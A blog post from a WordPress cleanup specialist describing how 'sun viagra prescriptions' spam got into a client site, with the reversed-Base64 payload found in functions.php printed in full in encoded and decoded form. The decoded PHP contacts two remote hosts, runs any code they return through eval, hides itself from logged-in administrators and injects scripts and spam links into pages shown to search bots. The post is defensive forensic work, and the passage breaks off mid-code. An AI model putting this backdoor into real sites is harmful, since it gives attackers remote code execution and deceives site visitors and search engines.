Fighting WordPress Malware and Spam – “sun viagra prescriptions” In the Header

WordPress Malware Base64At one point or another, you’ll encounter a website that has a line or link that seems out of place. In the case of this particular website, the phrase “sun viagra prescriptions” with a link one would never want to click had inserted itself onto every page of the website. Unfortunately for the website owner, this was ruining their business’ credibility.

As a well versed WordPress expert, I knew exactly where to look first. Okay, maybe not first, but I had a list of several places to look at right away. Lo and behold, the offender was to be found in the functions.php file. The spam was inserted as Base64 encoding, which was pretty typical of this sort of attack. Except as a way to not be detected by anti-virus/malware detectors on the server, it was reverse-Base64’d.

While I wanted to remove the offending code immediately, it is also important to perform a bit of WordPress forensics to try and pinpoint what the code is doing, to ensure it doesn’t come back.

The first step is to reverse the string through my tool of choice: http://www.string-functions.com/reverse.aspx

Here is the string before reversal:

"=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"

Here is the string once it is reversed:

ZnVuY3Rpb24gZ2V0X3VybF85OTkoJHVybCl7JGNvbnRlbnQ9IiI7JGNvbnRlbnQ9QHRyeWN1cmxfOTk5KCR1cmwpO2lmKCRjb250ZW50IT09ZmFsc2UpcmV0dXJuICRjb250ZW50OyRjb250ZW50PUB0cnlmaWxlXzk5OSgkdXJsKTtpZigkY29udGVudCE9PWZhbHNlKXJldHVybiAkY29udGVudDskY29udGVudD1AdHJ5Zm9wZW5fOTk5KCR1cmwpO2lmKCRjb250ZW50IT09ZmFsc2UpcmV0dXJuICRjb250ZW50OyRjb250ZW50PUB0cnlmc29ja29wZW5fOTk5KCR1cmwpO2lmKCRjb250ZW50IT09ZmFsc2UpcmV0dXJuICRjb250ZW50OyRjb250ZW50PUB0cnlzb2NrZXRfOTk5KCR1cmwpO2lmKCRjb250ZW50IT09ZmFsc2UpcmV0dXJuICRjb250ZW50O3JldHVybiAnJzt9CmZ1bmN0aW9uIHRyeWN1cmxfOTk5KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnY3VybF9pbml0Jyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JGNoID0gY3VybF9pbml0ICgpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVVJMLCR1cmwpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7Y3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOyRyZXN1bHQgPSBjdXJsX2V4ZWMgKCRjaCk7Y3VybF9jbG9zZSgkY2gpO2lmICgkcmVzdWx0PT0iIilyZXR1cm4gZmFsc2U7cmV0dXJuICRyZXN1bHQ7fQpmdW5jdGlvbiB0cnlmaWxlXzk5OSgkdXJsKXtpZihmdW5jdGlvbl9leGlzdHMoJ2ZpbGUnKT09PWZhbHNlKXJldHVybiBmYWxzZTskaW5jPUBmaWxlKCR1cmwpOyRidWY9QGltcGxvZGUoJycsJGluYyk7aWYgKCRidWY9PSIiKXJldHVybiBmYWxzZTtyZXR1cm4gJGJ1Zjt9CmZ1bmN0aW9uIHRyeWZvcGVuXzk5OSgkdXJsKXtpZihmdW5jdGlvbl9leGlzdHMoJ2ZvcGVuJyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JGJ1Zj0nJzskZj1AZm9wZW4oJHVybCwncicpO2lmICgkZil7d2hpbGUoIWZlb2YoJGYpKXskYnVmLj1mcmVhZCgkZiwxMDAwMCk7fWZjbG9zZSgkZik7fWVsc2UgcmV0dXJuIGZhbHNlO2lmICgkYnVmPT0iIilyZXR1cm4gZmFsc2U7cmV0dXJuICRidWY7fQpmdW5jdGlvbiB0cnlmc29ja29wZW5fOTk5KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnZnNvY2tvcGVuJyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JHA9QHBhcnNlX3VybCgkdXJsKTskaG9zdD0kcFsnaG9zdCddOyR1cmk9JHBbJ3BhdGgnXS4nPycuJHBbJ3F1ZXJ5J107JGY9QGZzb2Nrb3BlbigkaG9zdCw4MCwkZXJybm8sICRlcnJzdHIsMzApO2lmKCEkZilyZXR1cm4gZmFsc2U7JHJlcXVlc3QgPSJHRVQgJHVyaSBIVFRQLzEuMFxuIjskcmVxdWVzdC49Ikhvc3Q6ICRob3N0XG5cbiI7ZndyaXRlKCRmLCRyZXF1ZXN0KTskYnVmPScnO3doaWxlKCFmZW9mKCRmKSl7JGJ1Zi49ZnJlYWQoJGYsMTAwMDApO31mY2xvc2UoJGYpO2lmICgkYnVmPT0iIilyZXR1cm4gZmFsc2U7bGlzdCgkbSwkYnVmKT1leHBsb2RlKGNocigxMykuY2hyKDEwKS5jaHIoMTMpLmNocigxMCksJGJ1Zik7cmV0dXJuICRidWY7fQpmdW5jdGlvbiB0cnlzb2NrZXRfOTk5KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnc29ja2V0X2NyZWF0ZScpPT09ZmFsc2UpcmV0dXJuIGZhbHNlOyRwPUBwYXJzZV91cmwoJHVybCk7JGhvc3Q9JHBbJ2hvc3QnXTskdXJpPSRwWydwYXRoJ10uJz8nLiRwWydxdWVyeSddOyRpcDE9QGdldGhvc3RieW5hbWUoJGhvc3QpOyRpcDI9QGxvbmcyaXAoQGlwMmxvbmcoJGlwMSkpOyBpZiAoJGlwMSE9JGlwMilyZXR1cm4gZmFsc2U7JHNvY2s9QHNvY2tldF9jcmVhdGUoQUZfSU5FVCxTT0NLX1NUUkVBTSxTT0xfVENQKTtpZiAoIUBzb2NrZXRfY29ubmVjdCgkc29jaywkaXAxLDgwKSl7QHNvY2tldF9jbG9zZSgkc29jayk7cmV0dXJuIGZhbHNlO30kcmVxdWVzdCA9IkdFVCAkdXJpIEhUVFAvMS4wXG4iOyRyZXF1ZXN0Lj0iSG9zdDogJGhvc3RcblxuIjtzb2NrZXRfd3JpdGUoJHNvY2ssJHJlcXVlc3QpOyRidWY9Jyc7d2hpbGUoJHQ9c29ja2V0X3JlYWQoJHNvY2ssMTAwMDApKXskYnVmLj0kdDt9QHNvY2tldF9jbG9zZSgkc29jayk7aWYgKCRidWY9PSIiKXJldHVybiBmYWxzZTtsaXN0KCRtLCRidWYpPWV4cGxvZGUoY2hyKDEzKS5jaHIoMTApLmNocigxMykuY2hyKDEwKSwkYnVmKTtyZXR1cm4gJGJ1Zjt9CmZ1bmN0aW9uIHN0cl9yZXBsYWNlX2ZpcnN0KCRzZWFyY2gsICRyZXBsYWNlLCAkc3ViamVjdCkgeyRwb3MgPSBzdHJpcG9zKCRzdWJqZWN0LCAkc2VhcmNoKTtpZiAoJHBvcyAhPT0gZmFsc2UpIHsJJHN1YmplY3QgPSBzdWJzdHJfcmVwbGFjZSgkc3ViamVjdCwgJHJlcGxhY2UsICRwb3MsIHN0cmxlbigkc2VhcmNoKSk7fQlyZXR1cm4gJHN1YmplY3Q7fQpmdW5jdGlvbiBpc19ib3RfdWEoKXskYm90PTA7JHVhPUAkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107aWYgKHN0cmlzdHIoJHVhLCJtc25ib3QiKXx8c3RyaXN0cigkdWEsIllhaG9vIikpJGJvdD0xO2lmIChzdHJpc3RyKCR1YSwiYmluZ2JvdCIpfHxzdHJpc3RyKCR1YSwiZ29vZ2xlYm90IikpJGJvdD0xO3JldHVybiAkYm90O30KZnVuY3Rpb24gaXNfZ29vZ2xlYm90X2lwKCl7JGs9MDskaXA9c3ByaW50ZigiJXUiLEBpcDJsb25nKEAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXSkpO2lmICgoJGlwPj0xMTIzNjMxMTA0KSYmKCRpcDw9MTEyMzYzOTI5NSkpJGs9MTtyZXR1cm4gJGs7fQoKZnVuY3Rpb24gdXBkYXRlX2ZpbGVfOTk5KCl7CgoJJHVyaT0iZy5waHA/dD1wJmk9YjM3YTg5MTIiOwoJJGFjdHVhbDE9Imh0dHA6Ly9ubGludGhld29vZC5jb20vIi4kdXJpOwoJJGFjdHVhbDI9Imh0dHA6Ly9tYXhpZ2cucnUvIi4kdXJpOwoJJHZhbD1nZXRfdXJsXzk5OSgkYWN0dWFsMSk7CglpZiAoJHZhbD09IiIpJHZhbD1nZXRfdXJsXzk5OSgkYWN0dWFsMik7CglpZiAoc3Ryc3RyKCR2YWwsInx8fENPREV8fHwiKSl7CgkJbGlzdCgkdmFsLCRjb2RlKT1leHBsb2RlKCJ8fHxDT0RFfHx8IiwkdmFsKTsKCQlldmFsKGJhc2U2NF9kZWNvZGUoJGNvZGUpKTsKCX0KCXJldHVybiAkdmFsOwp9CgoKCmZ1bmN0aW9uIGNhbGxiYWNrX2Z1bmN0aW9uX3BocCgkcCkgewoKCWlmIChpc3NldCgkX0NPT0tJRVsnd29yZHByZXNzX3Rlc3RfY29va2llJ10pIHx8IGlzc2V0KCRfQ09PS0lFWyd3cC1zZXR0aW5ncy0xJ10pIHx8IGlzc2V0KCRfQ09PS0lFWyd3cC1zZXR0aW5ncy10aW1lLTEnXSkgfHwgKGZ1bmN0aW9uX2V4aXN0cygnaXNfdXNlcl9sb2dnZWRfaW4nKSAmJiBpc191c2VyX2xvZ2dlZF9pbigpKSApIHsKCQlyZXR1cm4gJHA7Cgl9CgoJJHg9J3tvcHRpb25zX25hbWVzfSc7CgkkYnVmPSIiOwoJJHVwZGF0ZT0wOwoJaWYgKCEkayA9IGdldF9vcHRpb24oJHgpKXsKCQlpZiAoIWFkZF9vcHRpb24oJHgsQXJyYXkoKSwnJywnbm8nKSl7CgkJCXJldHVybiAkcDsKCQl9CgkJJHVwZGF0ZT0xOwoJfWVsc2V7CgkJJGN0aW1lPXRpbWUoKS1AJGtbMV07CgkJaWYgKCRjdGltZT4zNjAwKjEyKXsKCQkJJHVwZGF0ZT0xOwoJCX0KCQkKCX0KCWlmICgkdXBkYXRlKXsKCQkkdmFsPXVwZGF0ZV9maWxlXzk5OSgpOwoJCSRrPWFycmF5KCk7CgkJJGtbMF09JHZhbDsKCQkka1sxXT10aW1lKCk7CgkJaWYgKCF1cGRhdGVfb3B0aW9uKCR4LCRrKSl7CgkJCXJldHVybiAkcDsKCQl9Cgl9CglpZiAoISRrID0gZ2V0X29wdGlvbigkeCkpewoJCXJldHVybiAkcDsKCX0KCgkkYnVmPUAka1swXTsKCWlmICgkYnVmPT0iIil7CgkJcmV0dXJuICRwOwoJfQoJbGlzdCgkdHlwZSwkdGV4dCk9QGV4cGxvZGUoInx8fCIsJGJ1Zik7CglpZiAoJHRleHQ9PSIiKXJldHVybiAkcDsKCgkkdHlwZSs9MDsKCSRib3Q9MDsKCWlmICgkdHlwZT09MCl7CgkJJGJ1ZjE9QGJhc2U2NF9kZWNvZGUoJHRleHQpOwoJCWxpc3QoJHRhZ2pzLCRqcywkdGFndGV4dDEsJHRleHQxKT1AZXhwbG9kZSgifHx8IiwkYnVmMSk7CgoJCWlmICgoJHRhZ2pzIT0iIikmJihzdHJpc3RyKCRwLCR0YWdqcykpKXsKCQkJJHA9c3RyX3JlcGxhY2VfZmlyc3QoJHRhZ2pzLCAkanMuIiAiLiR0YWdqcywgJHApOwoJCX1lbHNlewoJCQkkcD0kcC4kanM7CgkJfQoJCWlmICgoJHRhZ3RleHQxIT0iIikmJihzdHJpc3RyKCRwLCR0YWd0ZXh0MSkpKXsKCQkJJHA9c3RyX3JlcGxhY2VfZmlyc3QoJHRhZ3RleHQxLCAkdGV4dDEuIiAiLiR0YWd0ZXh0MSwgJHApOwoJCX1lbHNlewoJCQkkcD0kcC4kdGV4dDE7CgkJfQoJCQoJfWVsc2UKCWlmICgoJHR5cGU9PTEpfHwoJHR5cGU9PTIpfHwoJHR5cGU9PTMpfHwoJHR5cGU9PTQpKXsKCQlpZiAoKCR0eXBlPT0xKXx8KCR0eXBlPT00KSl7CgkJCSRib3Q9aXNfYm90X3VhKCk7CgkJfQoJCWlmICgoJHR5cGU9PTIpfHwoJHR5cGU9PTMpKXsKCQkJJGJvdD1pc19nb29nbGVib3RfaXAoKTsKCQl9CgoJCWlmICgkYm90KXsKCQkJJGJ1ZjE9QGJhc2U2NF9kZWNvZGUoJHRleHQpOwoJCQlsaXN0KCR0YWcsJHRleHQxKT1AZXhwbG9kZSgifHx8IiwkYnVmMSk7CgkJCWlmICgoJHRhZyE9IiIpJiYoJHRleHQxIT0iIikpewoKCQkJCWlmIChzdHJpc3RyKCRwLCR0YWcpKXsKCQkJCQlpZiAoKCR0eXBlPT0zKXx8KCR0eXBlPT00KSl7CgkJCQkJCSRwPUBzdHJfaXJlcGxhY2UoJHRhZywkdGFnLiIgIi4kdGV4dDEsJHApOyAKCQkJCQl9ZWxzZXsKCQkJCQkJJHA9c3RyX3JlcGxhY2VfZmlyc3QoJHRhZywgJHRhZy4iICIuJHRleHQxLCAkcCk7CgkJCQkJfQoJCQkJfWVsc2V7CgkJCQkJJHA9JHAuJHRleHQxOwoJCQkJfQoJCQl9CgoJCX0KCX0KCgoJcmV0dXJuICRwOyAKfSAKCgoKb2Jfc3RhcnQoImNhbGxiYWNrX2Z1bmN0aW9uX3BocCIpOwo=

With the code reversed into a standard base64 format, it can then be decoded using this next tool: http://www.base64decode.org/

Here is the decoded string:

function get_url_999($url){$content="";$content=@trycurl_999($url);if($content!==false)return $content;$content=@tryfile_999($url);if($content!==false)return $content;$content=@tryfopen_999($url);if($content!==false)return $content;$content=@tryfsockopen_999($url);if($content!==false)return $content;$content=@trysocket_999($url);if($content!==false)return $content;return '';}
function trycurl_999($url){if(function_exists('curl_init')===false)return false;$ch = curl_init ();curl_setopt ($ch, CURLOPT_URL,$url);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_TIMEOUT, 5);curl_setopt ($ch, CURLOPT_HEADER, 0);$result = curl_exec ($ch);curl_close($ch);if ($result=="")return false;return $result;}
function tryfile_999($url){if(function_exists('file')===false)return false;$inc=@file($url);$buf=@implode('',$inc);if ($buf=="")return false;return $buf;}
function tryfopen_999($url){if(function_exists('fopen')===false)return false;$buf='';$f=@fopen($url,'r');if ($f){while(!feof($f)){$buf.=fread($f,10000);}fclose($f);}else return false;if ($buf=="")return false;return $buf;}
function tryfsockopen_999($url){if(function_exists('fsockopen')===false)return false;$p=@parse_url($url);$host=$p['host'];$uri=$p['path'].'?'.$p['query'];$f=@fsockopen($host,80,$errno, $errstr,30);if(!$f)return false;$request ="GET $uri HTTP/1.0\n";$request.="Host: $host\n\n";fwrite($f,$request);$buf='';while(!feof($f)){$buf.=fread($f,10000);}fclose($f);if ($buf=="")return false;list($m,$buf)=explode(chr(13).chr(10).chr(13).chr(10),$buf);return $buf;}
function trysocket_999($url){if(function_exists('socket_create')===false)return false;$p=@parse_url($url);$host=$p['host'];$uri=$p['path'].'?'.$p['query'];$ip1=@gethostbyname($host);$ip2=@long2ip(@ip2long($ip1)); if ($ip1!=$ip2)return false;$sock=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);if (!@socket_connect($sock,$ip1,80)){@socket_close($sock);return false;}$request ="GET $uri HTTP/1.0\n";$request.="Host: $host\n\n";socket_write($sock,$request);$buf='';while($t=socket_read($sock,10000)){$buf.=$t;}@socket_close($sock);if ($buf=="")return false;list($m,$buf)=explode(chr(13).chr(10).chr(13).chr(10),$buf);return $buf;}
function str_replace_first($search, $replace, $subject) {$pos = stripos($subject, $search);if ($pos !== false) { $subject = substr_replace($subject, $replace, $pos, strlen($search));} return $subject;}
function is_bot_ua(){$bot=0;$ua=@$_SERVER['HTTP_USER_AGENT'];if (stristr($ua,"msnbot")||stristr($ua,"Yahoo"))$bot=1;if (stristr($ua,"bingbot")||stristr($ua,"googlebot"))$bot=1;return $bot;}
function is_googlebot_ip(){$k=0;$ip=sprintf("%u",@ip2long(@$_SERVER["REMOTE_ADDR"]));if (($ip>=1123631104)&&($ip<=1123639295))$k=1;return $k;} function update_file_999(){ $uri="g.php?t=p&i=b37a8912"; $actual1="http://nlinthewood.com/".$uri; $actual2="http://maxigg.ru/".$uri; $val=get_url_999($actual1); if ($val=="")$val=get_url_999($actual2); if (strstr($val,"|||CODE|||")){ list($val,$code)=explode("|||CODE|||",$val); eval(base64_decode($code)); } return $val; } function callback_function_php($p) { if (isset($_COOKIE['wordpress_test_cookie']) || isset($_COOKIE['wp-settings-1']) || isset($_COOKIE['wp-settings-time-1']) || (function_exists('is_user_logged_in') && is_user_logged_in()) ) { return $p; } $x='{options_names}'; $buf=""; $update=0; if (!$k = get_option($x)){ if (!add_option($x,Array(),'','no')){ return $p; } $update=1; }else{ $ctime=time()-@$k[1]; if ($ctime>3600*12){
$update=1;
}

}
if ($update){
$val=update_file_999();
$k=array();
$k[0]=$val;
$k[1]=time();
if (!update_option($x,$k)){
return $p;
}
}
if (!$k = get_option($x)){
return $p;
}

$buf=@$k[0];
if ($buf==””){
return $p;
}
list($type,$text)=@explode(“|||”,$buf);
if ($text==””)return $p;

$type+=0;
$bot=0;
if ($type==0){
$buf1=@base64_decode($text);
list($tagjs,$js,$tagtext1,$text1)=@explode(“|||”,$buf1);

if (($tagjs!=””)&&(stristr($p,$tagjs))){
$p=str_replace_first($tagjs, $js.” “.$tagjs, $p);
}else{
$p=$p.$js;
}
if (($tagtext1!=””)&&(stristr($p,$tagtext1))){
$p=str_replace_first($tagtext1, $text1.” “.$tagtext1, $p);
}else{
$p=$p.$text1;
}

}else
if (($type==1)||($type==2)||($type==3)||($type==4)){
if (($type==1)||($type==4)){
$bot=is_bot_ua();
}
if (($type==2)||($type==3)){
